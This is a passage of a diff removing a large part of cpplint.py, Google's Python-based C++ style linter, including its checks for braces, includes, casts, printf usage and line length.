beginning of a function: - # Function(...) { - # {}; - # } - # - # Note that naively checking for the preceding "{" will also match - # braces inside multi-dimensional arrays, but this is fine since - # that expression will not contain semicolons. - # - # 6. Block following another block: - # while (true) {} - # {}; - # - # 7. End of namespaces: - # namespace {}; - # - # These semicolons seems far more common than other kinds of - # redundant semicolons, possibly due to people converting classes - # to namespaces. For now we do not warn for this case. - # - # Try matching case 1 first. - match = Match(r'^(.*\)\s*)\{', line) - if match: - # Matched closing parenthesis (case 1). Check the token before the - # matching opening parenthesis, and don't warn if it looks like a - # macro. This avoids these false positives: - # - macro that defines a base class - # - multi-line macro that defines a base class - # - macro that defines the whole class-head - # - # But we still issue warnings for macros that we know are safe to - # warn, specifically: - # - TEST, TEST_F, TEST_P, MATCHER, MATCHER_P - # - TYPED_TEST - # - INTERFACE_DEF - # - EXCLUSIVE_LOCKS_REQUIRED, SHARED_LOCKS_REQUIRED, LOCKS_EXCLUDED: - # - # We implement a whitelist of safe macros instead of a blacklist of - # unsafe macros, even though the latter appears less frequently in - # google code and would have been easier to implement. This is because - # the downside for getting the whitelist wrong means some extra - # semicolons, while the downside for getting the blacklist wrong - # would result in compile errors. - # - # In addition to macros, we also don't want to warn on compound - # literals. - closing_brace_pos = match.group(1).rfind(')') - opening_parenthesis = ReverseCloseExpression( - clean_lines, linenum, closing_brace_pos) - if opening_parenthesis[2] > -1: - line_prefix = opening_parenthesis[0][0:opening_parenthesis[2]] - macro = Search(r'\b([A-Z_]+)\s*$', line_prefix) - if ((macro and - macro.group(1) not in ( - 'TEST', 'TEST_F', 'MATCHER', 'MATCHER_P', 'TYPED_TEST', - 'EXCLUSIVE_LOCKS_REQUIRED', 'SHARED_LOCKS_REQUIRED', - 'LOCKS_EXCLUDED', 'INTERFACE_DEF')) or - Search(r'\s+=\s*$', line_prefix)): - match = None - # Whitelist lambda function definition which also requires a ";" after - # closing brace - if match: - if Match(r'^.*\[.*\]\s*(.*\)\s*)\{', line): - match = None - - else: - # Try matching cases 2-3. - match = Match(r'^(.*(?:else|\)\s*const)\s*)\{', line) - if not match: - # Try matching cases 4-6. These are always matched on separate lines. - # - # Note that we can't simply concatenate the previous line to the - # current line and do a single match, otherwise we may output - # duplicate warnings for the blank line case: - # if (cond) { - # // blank line - # } - prevline = GetPreviousNonBlankLine(clean_lines, linenum)[0] - if prevline and Search(r'[;{}]\s*$', prevline): - match = Match(r'^(\s*)\{', line) - - # Check matching closing brace - if match: - (endline, endlinenum, endpos) = CloseExpression( - clean_lines, linenum, len(match.group(1))) - if endpos > -1 and Match(r'^\s*;', endline[endpos:]): - # Current {} pair is eligible for semicolon check, and we have found - # the redundant semicolon, output warning here. - # - # Note: because we are scanning forward for opening braces, and - # outputting warnings for the matching closing brace, if there are - # nested blocks with trailing semicolons, we will get the error - # messages in reversed order. - error(filename, endlinenum, 'readability/braces', 4, - "You don't need a ; after a }") - - -def CheckEmptyBlockBody(filename, clean_lines, linenum, error): - """Look for empty loop/conditional body with only a single semicolon. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - - # Search for loop keywords at the beginning of the line. Because only - # whitespaces are allowed before the keywords, this will also ignore most - # do-while-loops, since those lines should start with closing brace. - # - # We also check "if" blocks here, since an empty conditional block - # is likely an error. - line = clean_lines.elided[linenum] - matched = Match(r'\s*(for|while|if)\s*\(', line) - if matched: - # Find the end of the conditional expression - (end_line, end_linenum, end_pos) = CloseExpression( - clean_lines, linenum, line.find('(')) - - # Output warning if what follows the condition expression is a semicolon. - # No warning for all other cases, including whitespace or newline, since we - # have a separate check for semicolons preceded by whitespace. - if end_pos >= 0 and Match(r';', end_line[end_pos:]): - if matched.group(1) == 'if': - error(filename, end_linenum, 'whitespace/empty_conditional_body', 5, - 'Empty conditional bodies should use {}') - else: - error(filename, end_linenum, 'whitespace/empty_loop_body', 5, - 'Empty loop bodies should use {} or continue') - - -def CheckCheck(filename, clean_lines, linenum, error): - """Checks the use of CHECK and EXPECT macros. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - - # Decide the set of replacement macros that should be suggested - lines = clean_lines.elided - check_macro = None - start_pos = -1 - for macro in _CHECK_MACROS: - i = lines[linenum].find(macro) - if i >= 0: - check_macro = macro - - # Find opening parenthesis. Do a regular expression match here - # to make sure that we are matching the expected CHECK macro, as - # opposed to some other macro that happens to contain the CHECK - # substring. - matched = Match(r'^(.*\b' + check_macro + r'\s*)\(', lines[linenum]) - if not matched: - continue - start_pos = len(matched.group(1)) - break - if not check_macro or start_pos < 0: - # Don't waste time here if line doesn't contain 'CHECK' or 'EXPECT' - return - - # Find end of the boolean expression by matching parentheses - (last_line, end_line, end_pos) = CloseExpression( - clean_lines, linenum, start_pos) - if end_pos < 0: - return - if linenum == end_line: - expression = lines[linenum][start_pos + 1:end_pos - 1] - else: - expression = lines[linenum][start_pos + 1:] - for i in xrange(linenum + 1, end_line): - expression += lines[i] - expression += last_line[0:end_pos - 1] - - # Parse expression so that we can take parentheses into account. - # This avoids false positives for inputs like "CHECK((a < 4) == b)", - # which is not replaceable by CHECK_LE. - lhs = '' - rhs = '' - operator = None - while expression: - matched = Match(r'^\s*(<<|<<=|>>|>>=|->\*|->|&&|\|\||' - r'==|!=|>=|>|<=|<|\()(.*)$', expression) - if matched: - token = matched.group(1) - if token == '(': - # Parenthesized operand - expression = matched.group(2) - (end, _) = FindEndOfExpressionInLine(expression, 0, 1, '(', ')') - if end < 0: - return # Unmatched parenthesis - lhs += '(' + expression[0:end] - expression = expression[end:] - elif token in ('&&', '||'): - # Logical and/or operators. This means the expression - # contains more than one term, for example: - # CHECK(42 < a && a < b); - # - # These are not replaceable with CHECK_LE, so bail out early. - return - elif token in ('<<', '<<=', '>>', '>>=', '->*', '->'): - # Non-relational operator - lhs += token - expression = matched.group(2) - else: - # Relational operator - operator = token - rhs = matched.group(2) - break - else: - # Unparenthesized operand. Instead of appending to lhs one character - # at a time, we do another regular expression match to consume several - # characters at once if possible. Trivial benchmark shows that this - # is more efficient when the operands are longer than a single - # character, which is generally the case. - matched = Match(r'^([^-=!<>()&|]+)(.*)$', expression) - if not matched: - matched = Match(r'^(\s*\S)(.*)$', expression) - if not matched: - break - lhs += matched.group(1) - expression = matched.group(2) - - # Only apply checks if we got all parts of the boolean expression - if not (lhs and operator and rhs): - return - - # Check that rhs do not contain logical operators. We already know - # that lhs is fine since the loop above parses out && and ||. - if rhs.find('&&') > -1 or rhs.find('||') > -1: - return - - # At least one of the operands must be a constant literal. This is - # to avoid suggesting replacements for unprintable things like - # CHECK(variable != iterator) - # - # The following pattern matches decimal, hex integers, strings, and - # characters (in that order). - lhs = lhs.strip() - rhs = rhs.strip() - match_constant = r'^([-+]?(\d+|0[xX][0-9a-fA-F]+)[lLuU]{0,3}|".*"|\'.*\')$' - if Match(match_constant, lhs) or Match(match_constant, rhs): - # Note: since we know both lhs and rhs, we can provide a more - # descriptive error message like: - # Consider using CHECK_EQ(x, 42) instead of CHECK(x == 42) - # Instead of: - # Consider using CHECK_EQ instead of CHECK(a == b) - # - # We are still keeping the less descriptive message because if lhs - # or rhs gets long, the error message might become unreadable. - error(filename, linenum, 'readability/check', 2, - 'Consider using %s instead of %s(a %s b)' % ( - _CHECK_REPLACEMENT[check_macro][operator], - check_macro, operator)) - - -def CheckAltTokens(filename, clean_lines, linenum, error): - """Check alternative keywords being used in boolean expressions. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - line = clean_lines.elided[linenum] - - # Avoid preprocessor lines - if Match(r'^\s*#', line): - return - - # Last ditch effort to avoid multi-line comments. This will not help - # if the comment started before the current line or ended after the - # current line, but it catches most of the false positives. At least, - # it provides a way to workaround this warning for people who use - # multi-line comments in preprocessor macros. - # - # TODO(unknown): remove this once cpplint has better support for - # multi-line comments. - if line.find('/*') >= 0 or line.find('*/') >= 0: - return - - for match in _ALT_TOKEN_REPLACEMENT_PATTERN.finditer(line): - error(filename, linenum, 'readability/alt_tokens', 2, - 'Use operator %s instead of %s' % ( - _ALT_TOKEN_REPLACEMENT[match.group(1)], match.group(1))) - - -def GetLineWidth(line): - """Determines the width of the line in column positions. - - Args: - line: A string, which may be a Unicode string. - - Returns: - The width of the line in column positions, accounting for Unicode - combining characters and wide characters. - """ - if isinstance(line, unicode): - width = 0 - for uc in unicodedata.normalize('NFC', line): - if unicodedata.east_asian_width(uc) in ('W', 'F'): - width += 2 - elif not unicodedata.combining(uc): - width += 1 - return width - else: - return len(line) - - -def CheckStyle(filename, clean_lines, linenum, file_extension, nesting_state, - error): - """Checks rules from the 'C++ style rules' section of cppguide.html. - - Most of these rules are hard to test (naming, comment style), but we - do what we can. In particular we check for 2-space indents, line lengths, - tab usage, spaces inside code, etc. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - file_extension: The extension (without the dot) of the filename. - nesting_state: A _NestingState instance which maintains information about - the current stack of nested blocks being parsed. - error: The function to call with any errors found. - """ - - # Don't use "elided" lines here, otherwise we can't check commented lines. - # Don't want to use "raw" either, because we don't want to check inside C++11 - # raw strings, - raw_lines = clean_lines.lines_without_raw_strings - line = raw_lines[linenum] - - if line.find('\t') != -1: - error(filename, linenum, 'whitespace/tab', 1, - 'Tab found; better to use spaces') - - # One or three blank spaces at the beginning of the line is weird; it's - # hard to reconcile that with 2-space indents. - # NOTE: here are the conditions rob pike used for his tests. Mine aren't - # as sophisticated, but it may be worth becoming so: RLENGTH==initial_spaces - # if(RLENGTH > 20) complain = 0; - # if(match($0, " +(error|private|public|protected):")) complain = 0; - # if(match(prev, "&& *$")) complain = 0; - # if(match(prev, "\\|\\| *$")) complain = 0; - # if(match(prev, "[\",=><] *$")) complain = 0; - # if(match($0, " <<")) complain = 0; - # if(match(prev, " +for \\(")) complain = 0; - # if(prevodd && match(prevprev, " +for \\(")) complain = 0; - initial_spaces = 0 - cleansed_line = clean_lines.elided[linenum] - while initial_spaces < len(line) and line[initial_spaces] == ' ': - initial_spaces += 1 - if line and line[-1].isspace(): - error(filename, linenum, 'whitespace/end_of_line', 4, - 'Line ends in whitespace. Consider deleting these extra spaces.') - # There are certain situations we allow one space, notably for section labels - elif ((initial_spaces == 1 or initial_spaces == 3) and - not Match(r'\s*\w+\s*:\s*$', cleansed_line)): - error(filename, linenum, 'whitespace/indent', 3, - 'Weird number of spaces at line-start. ' - 'Are you using a 2-space indent?') - - # Check if the line is a header guard. - is_header_guard = False - if file_extension == 'h': - cppvar = GetHeaderGuardCPPVariable(filename) - if (line.startswith('#ifndef %s' % cppvar) or - line.startswith('#define %s' % cppvar) or - line.startswith('#endif // %s' % cppvar)): - is_header_guard = True - # #include lines and header guards can be long, since there's no clean way to - # split them. - # - # URLs can be long too. It's possible to split these, but it makes them - # harder to cut&paste. - # - # The "$Id:...$" comment may also get very long without it being the - # developers fault. - if (not line.startswith('#include') and not is_header_guard and - not Match(r'^\s*//.*http(s?)://\S*$', line) and - not Match(r'^// \$Id:.*#[0-9]+ \$$', line)): - line_width = GetLineWidth(line) - extended_length = int((_line_length * 1.25)) - if line_width > extended_length: - error(filename, linenum, 'whitespace/line_length', 4, - 'Lines should very rarely be longer than %i characters' % - extended_length) - elif line_width > _line_length: - error(filename, linenum, 'whitespace/line_length', 2, - 'Lines should be <= %i characters long' % _line_length) - - if (cleansed_line.count(';') > 1 and - # for loops are allowed two ;'s (and may run over two lines). - cleansed_line.find('for') == -1 and - (GetPreviousNonBlankLine(clean_lines, linenum)[0].find('for') == -1 or - GetPreviousNonBlankLine(clean_lines, linenum)[0].find(';') != -1) and - # It's ok to have many commands in a switch case that fits in 1 line - not ((cleansed_line.find('case ') != -1 or - cleansed_line.find('default:') != -1) and - cleansed_line.find('break;') != -1)): - error(filename, linenum, 'whitespace/newline', 0, - 'More than one command on the same line') - - # Some more style checks - CheckBraces(filename, clean_lines, linenum, error) - CheckEmptyBlockBody(filename, clean_lines, linenum, error) - CheckAccess(filename, clean_lines, linenum, nesting_state, error) - CheckSpacing(filename, clean_lines, linenum, nesting_state, error) - CheckCheck(filename, clean_lines, linenum, error) - CheckAltTokens(filename, clean_lines, linenum, error) - classinfo = nesting_state.InnermostClass() - if classinfo: - CheckSectionSpacing(filename, clean_lines, classinfo, linenum, error) - - -_RE_PATTERN_INCLUDE_NEW_STYLE = re.compile(r'#include +"[^/]+\.h"') -_RE_PATTERN_INCLUDE = re.compile(r'^\s*#\s*include\s*([<"])([^>"]*)[>"].*$') -# Matches the first component of a filename delimited by -s and _s. That is: -# _RE_FIRST_COMPONENT.match('foo').group(0) == 'foo' -# _RE_FIRST_COMPONENT.match('foo.cc').group(0) == 'foo' -# _RE_FIRST_COMPONENT.match('foo-bar_baz.cc').group(0) == 'foo' -# _RE_FIRST_COMPONENT.match('foo_bar-baz.cc').group(0) == 'foo' -_RE_FIRST_COMPONENT = re.compile(r'^[^-_.]+') - - -def _DropCommonSuffixes(filename): - """Drops common suffixes like _test.cc or -inl.h from filename. - - For example: - >>> _DropCommonSuffixes('foo/foo-inl.h') - 'foo/foo' - >>> _DropCommonSuffixes('foo/bar/foo.cc') - 'foo/bar/foo' - >>> _DropCommonSuffixes('foo/foo_internal.h') - 'foo/foo' - >>> _DropCommonSuffixes('foo/foo_unusualinternal.h') - 'foo/foo_unusualinternal' - - Args: - filename: The input filename. - - Returns: - The filename with the common suffix removed. - """ - for suffix in ('test.cc', 'regtest.cc', 'unittest.cc', - 'inl.h', 'impl.h', 'internal.h'): - if (filename.endswith(suffix) and len(filename) > len(suffix) and - filename[-len(suffix) - 1] in ('-', '_')): - return filename[:-len(suffix) - 1] - return os.path.splitext(filename)[0] - - -def _IsTestFilename(filename): - """Determines if the given filename has a suffix that identifies it as a test. - - Args: - filename: The input filename. - - Returns: - True if 'filename' looks like a test, False otherwise. - """ - if (filename.endswith('_test.cc') or - filename.endswith('_unittest.cc') or - filename.endswith('_regtest.cc')): - return True - else: - return False - - -def _ClassifyInclude(fileinfo, include, is_system): - """Figures out what kind of header 'include' is. - - Args: - fileinfo: The current file cpplint is running over. A FileInfo instance. - include: The path to a #included file. - is_system: True if the #include used <> rather than "". - - Returns: - One of the _XXX_HEADER constants. - - For example: - >>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'stdio.h', True) - _C_SYS_HEADER - >>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'string', True) - _CPP_SYS_HEADER - >>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'foo/foo.h', False) - _LIKELY_MY_HEADER - >>> _ClassifyInclude(FileInfo('foo/foo_unknown_extension.cc'), - ... 'bar/foo_other_ext.h', False) - _POSSIBLE_MY_HEADER - >>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'foo/bar.h', False) - _OTHER_HEADER - """ - # This is a list of all standard c++ header files, except - # those already checked for above. - is_cpp_h = include in _CPP_HEADERS - - if is_system: - if is_cpp_h: - return _CPP_SYS_HEADER - else: - return _C_SYS_HEADER - - # If the target file and the include we're checking share a - # basename when we drop common extensions, and the include - # lives in . , then it's likely to be owned by the target file. - target_dir, target_base = ( - os.path.split(_DropCommonSuffixes(fileinfo.RepositoryName()))) - include_dir, include_base = os.path.split(_DropCommonSuffixes(include)) - if target_base == include_base and ( - include_dir == target_dir or - include_dir == os.path.normpath(target_dir + '/../public')): - return _LIKELY_MY_HEADER - - # If the target and include share some initial basename - # component, it's possible the target is implementing the - # include, so it's allowed to be first, but we'll never - # complain if it's not there. - target_first_component = _RE_FIRST_COMPONENT.match(target_base) - include_first_component = _RE_FIRST_COMPONENT.match(include_base) - if (target_first_component and include_first_component and - target_first_component.group(0) == - include_first_component.group(0)): - return _POSSIBLE_MY_HEADER - - return _OTHER_HEADER - - - -def CheckIncludeLine(filename, clean_lines, linenum, include_state, error): - """Check rules that are applicable to #include lines. - - Strings on #include lines are NOT removed from elided line, to make - certain tasks easier. However, to prevent false positives, checks - applicable to #include lines in CheckLanguage must be put here. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - include_state: An _IncludeState instance in which the headers are inserted. - error: The function to call with any errors found. - """ - fileinfo = FileInfo(filename) - - line = clean_lines.lines[linenum] - - # "include" should use the new style "foo/bar.h" instead of just "bar.h" - if _RE_PATTERN_INCLUDE_NEW_STYLE.search(line): - error(filename, linenum, 'build/include', 4, - 'Include the directory when naming .h files') - - # we shouldn't include a file more than once. actually, there are a - # handful of instances where doing so is okay, but in general it's - # not. - match = _RE_PATTERN_INCLUDE.search(line) - if match: - include = match.group(2) - is_system = (match.group(1) == '<') - if include in include_state: - error(filename, linenum, 'build/include', 4, - '"%s" already included at %s:%s' % - (include, filename, include_state[include])) - else: - include_state[include] = linenum - - # We want to ensure that headers appear in the right order: - # 1) for foo.cc, foo.h (preferred location) - # 2) c system files - # 3) cpp system files - # 4) for foo.cc, foo.h (deprecated location) - # 5) other google headers - # - # We classify each include statement as one of those 5 types - # using a number of techniques. The include_state object keeps - # track of the highest type seen, and complains if we see a - # lower type after that. - error_message = include_state.CheckNextIncludeOrder( - _ClassifyInclude(fileinfo, include, is_system)) - if error_message: - error(filename, linenum, 'build/include_order', 4, - '%s. Should be: %s.h, c system, c++ system, other.' % - (error_message, fileinfo.BaseName())) - canonical_include = include_state.CanonicalizeAlphabeticalOrder(include) - if not include_state.IsInAlphabeticalOrder( - clean_lines, linenum, canonical_include): - error(filename, linenum, 'build/include_alpha', 4, - 'Include "%s" not in alphabetical order' % include) - include_state.SetLastHeader(canonical_include) - - # Look for any of the stream classes that are part of standard C++. - match = _RE_PATTERN_INCLUDE.match(line) - if match: - include = match.group(2) - if Match(r'(f|ind|io|i|o|parse|pf|stdio|str|)?stream$', include): - # Many unit tests use cout, so we exempt them. - if not _IsTestFilename(filename): - error(filename, linenum, 'readability/streams', 3, - 'Streams are highly discouraged.') - - -def _GetTextInside(text, start_pattern): - r"""Retrieves all the text between matching open and close parentheses. - - Given a string of lines and a regular expression string, retrieve all the text - following the expression and between opening punctuation symbols like - (, [, or {, and the matching close-punctuation symbol. This properly nested - occurrences of the punctuations, so for the text like - printf(a(), b(c())); - a call to _GetTextInside(text, r'printf\(') will return 'a(), b(c())'. - start_pattern must match string having an open punctuation symbol at the end. - - Args: - text: The lines to extract text. Its comments and strings must be elided. - It can be single line and can span multiple lines. - start_pattern: The regexp string indicating where to start extracting - the text. - Returns: - The extracted text. - None if either the opening string or ending punctuation could not be found. - """ - # TODO(sugawarayu): Audit cpplint.py to see what places could be profitably - # rewritten to use _GetTextInside (and use inferior regexp matching today). - - # Give opening punctuations to get the matching close-punctuations. - matching_punctuation = {'(': ')', '{': '}', '[': ']'} - closing_punctuation = set(matching_punctuation.itervalues()) - - # Find the position to start extracting text. - match = re.search(start_pattern, text, re.M) - if not match: # start_pattern not found in text. - return None - start_position = match.end(0) - - assert start_position > 0, ( - 'start_pattern must ends with an opening punctuation.') - assert text[start_position - 1] in matching_punctuation, ( - 'start_pattern must ends with an opening punctuation.') - # Stack of closing punctuations we expect to have in text after position. - punctuation_stack = [matching_punctuation[text[start_position - 1]]] - position = start_position - while punctuation_stack and position < len(text): - if text[position] == punctuation_stack[-1]: - punctuation_stack.pop() - elif text[position] in closing_punctuation: - # A closing punctuation without matching opening punctuations. - return None - elif text[position] in matching_punctuation: - punctuation_stack.append(matching_punctuation[text[position]]) - position += 1 - if punctuation_stack: - # Opening punctuations left without matching close-punctuations. - return None - # punctuations match. - return text[start_position:position - 1] - - -# Patterns for matching call-by-reference parameters. -# -# Supports nested templates up to 2 levels deep using this messy pattern: -# < (?: < (?: < [^<>]* -# > -# | [^<>] )* -# > -# | [^<>] )* -# > -_RE_PATTERN_IDENT = r'[_a-zA-Z]\w*' # =~ [[:alpha:]][[:alnum:]]* -_RE_PATTERN_TYPE = ( - r'(?:const\s+)?(?:typename\s+|class\s+|struct\s+|union\s+|enum\s+)?' - r'(?:\w|' - r'\s*<(?:<(?:<[^<>]*>|[^<>])*>|[^<>])*>|' - r'::)+') -# A call-by-reference parameter ends with '& identifier'. -_RE_PATTERN_REF_PARAM = re.compile( - r'(' + _RE_PATTERN_TYPE + r'(?:\s*(?:\bconst\b|[*]))*\s*' - r'&\s*' + _RE_PATTERN_IDENT + r')\s*(?:=[^,()]+)?[,)]') -# A call-by-const-reference parameter either ends with 'const& identifier' -# or looks like 'const type& identifier' when 'type' is atomic. -_RE_PATTERN_CONST_REF_PARAM = ( - r'(?:.*\s*\bconst\s*&\s*' + _RE_PATTERN_IDENT + - r'|const\s+' + _RE_PATTERN_TYPE + r'\s*&\s*' + _RE_PATTERN_IDENT + r')') - - -def CheckLanguage(filename, clean_lines, linenum, file_extension, - include_state, nesting_state, error): - """Checks rules from the 'C++ language rules' section of cppguide.html. - - Some of these rules are hard to test (function overloading, using - uint32 inappropriately), but we do the best we can. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - file_extension: The extension (without the dot) of the filename. - include_state: An _IncludeState instance in which the headers are inserted. - nesting_state: A _NestingState instance which maintains information about - the current stack of nested blocks being parsed. - error: The function to call with any errors found. - """ - # If the line is empty or consists of entirely a comment, no need to - # check it. - line = clean_lines.elided[linenum] - if not line: - return - - match = _RE_PATTERN_INCLUDE.search(line) - if match: - CheckIncludeLine(filename, clean_lines, linenum, include_state, error) - return - - # Reset include state across preprocessor directives. This is meant - # to silence warnings for conditional includes. - if Match(r'^\s*#\s*(?:ifdef|elif|else|endif)\b', line): - include_state.ResetSection() - - # Make Windows paths like Unix. - fullname = os.path.abspath(filename).replace('\\', '/') - - # TODO(unknown): figure out if they're using default arguments in fn proto. - - # Check to see if they're using an conversion function cast. - # I just try to capture the most common basic types, though there are more. - # Parameterless conversion functions, such as bool(), are allowed as they are - # probably a member operator declaration or default constructor. - match = Search( - r'(\bnew\s+)?\b' # Grab 'new' operator, if it's there - r'(int|float|double|bool|char|int32|uint32|int64|uint64)' - r'(\([^)].*)', line) - if match: - matched_new = match.group(1) - matched_type = match.group(2) - matched_funcptr = match.group(3) - - # gMock methods are defined using some variant of MOCK_METHODx(name, type) - # where type may be float(), int(string), etc. Without context they are - # virtually indistinguishable from int(x) casts. Likewise, gMock's - # MockCallback takes a template parameter of the form return_type(arg_type), - # which looks much like the cast we're trying to detect. - # - # std::function<> wrapper has a similar problem. - # - # Return types for function pointers also look like casts if they - # don't have an extra space. - if (matched_new is None and # If new operator, then this isn't a cast - not (Match(r'^\s*MOCK_(CONST_)?METHOD\d+(_T)?\(', line) or - Search(r'\bMockCallback<.*>', line) or - Search(r'\bstd::function<.*>', line)) and - not (matched_funcptr and - Match(r'\((?:[^() ]+::\s*\*\s*)?[^() ]+\)\s*\(', - matched_funcptr))): - # Try a bit harder to catch gmock lines: the only place where - # something looks like an old-style cast is where we declare the - # return type of the mocked method, and the only time when we - # are missing context is if MOCK_METHOD was split across - # multiple lines. The missing MOCK_METHOD is usually one or two - # lines back, so scan back one or two lines. - # - # It's not possible for gmock macros to appear in the first 2 - # lines, since the class head + section name takes up 2 lines. - if (linenum < 2 or - not (Match(r'^\s*MOCK_(?:CONST_)?METHOD\d+(?:_T)?\((?:\S+,)?\s*$', - clean_lines.elided[linenum - 1]) or - Match(r'^\s*MOCK_(?:CONST_)?METHOD\d+(?:_T)?\(\s*$', - clean_lines.elided[linenum - 2]))): - error(filename, linenum, 'readability/casting', 4, - 'Using deprecated casting style. ' - 'Use static_cast<%s>(...) instead' % - matched_type) - - CheckCStyleCast(filename, linenum, line, clean_lines.raw_lines[linenum], - 'static_cast', - r'\((int|float|double|bool|char|u?int(16|32|64))\)', error) - - # This doesn't catch all cases. Consider (const char * const)"hello". - # - # (char *) "foo" should always be a const_cast (reinterpret_cast won't - # compile). - if CheckCStyleCast(filename, linenum, line, clean_lines.raw_lines[linenum], - 'const_cast', r'\((char\s?\*+\s?)\)\s*"', error): - pass - else: - # Check pointer casts for other than string constants - CheckCStyleCast(filename, linenum, line, clean_lines.raw_lines[linenum], - 'reinterpret_cast', r'\((\w+\s?\*+\s?)\)', error) - - # In addition, we look for people taking the address of a cast. This - # is dangerous -- casts can assign to temporaries, so the pointer doesn't - # point where you think. - match = Search( - r'(?:&\(([^)]+)\)[\w(])|' - r'(?:&(static|dynamic|down|reinterpret)_cast\b)', line) - if match and match.group(1) != '*': - error(filename, linenum, 'runtime/casting', 4, - ('Are you taking an address of a cast? ' - 'This is dangerous: could be a temp var. ' - 'Take the address before doing the cast, rather than after')) - - # Create an extended_line, which is the concatenation of the current and - # next lines, for more effective checking of code that may span more than one - # line. - if linenum + 1 < clean_lines.NumLines(): - extended_line = line + clean_lines.elided[linenum + 1] - else: - extended_line = line - - # Check for people declaring static/global STL strings at the top level. - # This is dangerous because the C++ language does not guarantee that - # globals with constructors are initialized before the first access. - match = Match( - r'((?:|static +)(?:|const +))string +([a-zA-Z0-9_:]+)\b(.*)', - line) - # Make sure it's not a function. - # Function template specialization looks like: "string foo(...". - # Class template definitions look like: "string Foo::Method(...". - # - # Also ignore things that look like operators. These are matched separately - # because operator names cross non-word boundaries. If we change the pattern - # above, we would decrease the accuracy of matching identifiers. - if (match and - not Search(r'\boperator\W', line) and - not Match(r'\s*(<.*>)?(::[a-zA-Z0-9_]+)?\s*\(([^"]|$)', match.group(3))): - error(filename, linenum, 'runtime/string', 4, - 'For a static/global string constant, use a C style string instead: ' - '"%schar %s[]".' % - (match.group(1), match.group(2))) - - if Search(r'\b([A-Za-z0-9_]*_)\(\1\)', line): - error(filename, linenum, 'runtime/init', 4, - 'You seem to be initializing a member variable with itself.') - - if file_extension == 'h': - # TODO(unknown): check that 1-arg constructors are explicit. - # How to tell it's a constructor? - # (handled in CheckForNonStandardConstructs for now) - # TODO(unknown): check that classes have DISALLOW_EVIL_CONSTRUCTORS - # (level 1 error) - pass - - # Check if people are using the verboten C basic types. The only exception - # we regularly allow is "unsigned short port" for port. - if Search(r'\bshort port\b', line): - if not Search(r'\bunsigned short port\b', line): - error(filename, linenum, 'runtime/int', 4, - 'Use "unsigned short" for ports, not "short"') - else: - match = Search(r'\b(short|long(?! +double)|long long)\b', line) - if match: - error(filename, linenum, 'runtime/int', 4, - 'Use int16/int64/etc, rather than the C type %s' % match.group(1)) - - # When snprintf is used, the second argument shouldn't be a literal. - match = Search(r'snprintf\s*\(([^,]*),\s*([0-9]*)\s*,', line) - if match and match.group(2) != '0': - # If 2nd arg is zero, snprintf is used to calculate size. - error(filename, linenum, 'runtime/printf', 3, - 'If you can, use sizeof(%s) instead of %s as the 2nd arg ' - 'to snprintf.' % (match.group(1), match.group(2))) - - # Check if some verboten C functions are being used. - if Search(r'\bsprintf\b', line): - error(filename, linenum, 'runtime/printf', 5, - 'Never use sprintf. Use snprintf instead.') - match = Search(r'\b(strcpy|strcat)\b', line) - if match: - error(filename, linenum, 'runtime/printf', 4, - 'Almost always, snprintf is better than %s' % match.group(1)) - - # Check if some verboten operator overloading is going on - # TODO(unknown): catch out-of-line unary operator&: - # class X {}; - # int operator&(const X& x) { return 42; } // unary operator& - # The trick is it's hard to tell apart from binary operator&: - # class Y { int operator&(const Y& x) { return 23; } }; // binary operator& - if Search(r'\boperator\s*&\s*\(\s*\)', line): - error(filename, linenum, 'runtime/operator', 4, - 'Unary operator& is dangerous. Do not use it.') - - # Check for suspicious usage of "if" like - # } if (a == b) { - if Search(r'\}\s*if\s*\(', line): - error(filename, linenum, 'readability/braces', 4, - 'Did you mean "else if"? If not, start a new line for "if".') - - # Check for potential format string bugs like printf(foo). - # We constrain the pattern not to pick things like DocidForPrintf(foo). - # Not perfect but it can catch printf(foo.c_str()) and printf(foo->c_str()) - # TODO(sugawarayu): Catch the following case. Need to change the calling - # convention of the whole function to process multiple line to handle it. - # printf( - # boy_this_is_a_really_long_variable_that_cannot_fit_on_the_prev_line); - printf_args = _GetTextInside(line, r'(?i)\b(string)?printf\s*\(') - if printf_args: - match = Match(r'([\w.\->()]+)$', printf_args) - if match and match.group(1) != '__VA_ARGS__': - function_name = re.search(r'\b((?:string)?printf)\s*\(', - line, re.I).group(1) - error(filename, linenum, 'runtime/printf', 4, - 'Potential format string bug. Do %s("%%s", %s) instead.' - % (function_name, match.group(1))) - - # Check for potential memset bugs like memset(buf, sizeof(buf), 0). - match = Search(r'memset\s*\(([^,]*),\s*([^,]*),\s*0\s*\)', line) - if match and not Match(r"^''|-?[0-9]+|0x[0-9A-Fa-f]$", match.group(2)): - error(filename, linenum, 'runtime/memset', 4, - 'Did you mean "memset(%s, 0, %s)"?' - % (match.group(1), match.group(2))) - - if Search(r'\busing namespace\b', line): - error(filename, linenum, 'build/namespaces', 5, - 'Do not use namespace using-directives. ' - 'Use using-declarations instead.') - - # Detect variable-length arrays. - match = Match(r'\s*(.+::)?(\w+) [a-z]\w*\[(.+)];', line) - if (match and match.group(2) != 'return' and match.group(2) != 'delete' and - match.group(3).find(']') == -1): - # Split the size using space and arithmetic operators as delimiters. - # If any of the resulting tokens are not compile time constants then - # report the error. - tokens = re.split(r'\s|\+|\-|\*|\/|<<|>>]', match.group(3)) - is_const = True - skip_next = False - for tok in tokens: - if skip_next: - skip_next = False - continue - - if Search(r'sizeof\(.+\)', tok): continue - if Search(r'arraysize\(\w+\)', tok): continue - - tok = tok.lstrip('(') - tok = tok.rstrip(')') - if not tok: continue - if Match(r'\d+', tok): continue - if Match(r'0[xX][0-9a-fA-F]+', tok): continue - if Match(r'k[A-Z0-9]\w*', tok): continue - if Match(r'(.+::)?k[A-Z0-9]\w*', tok): continue - if 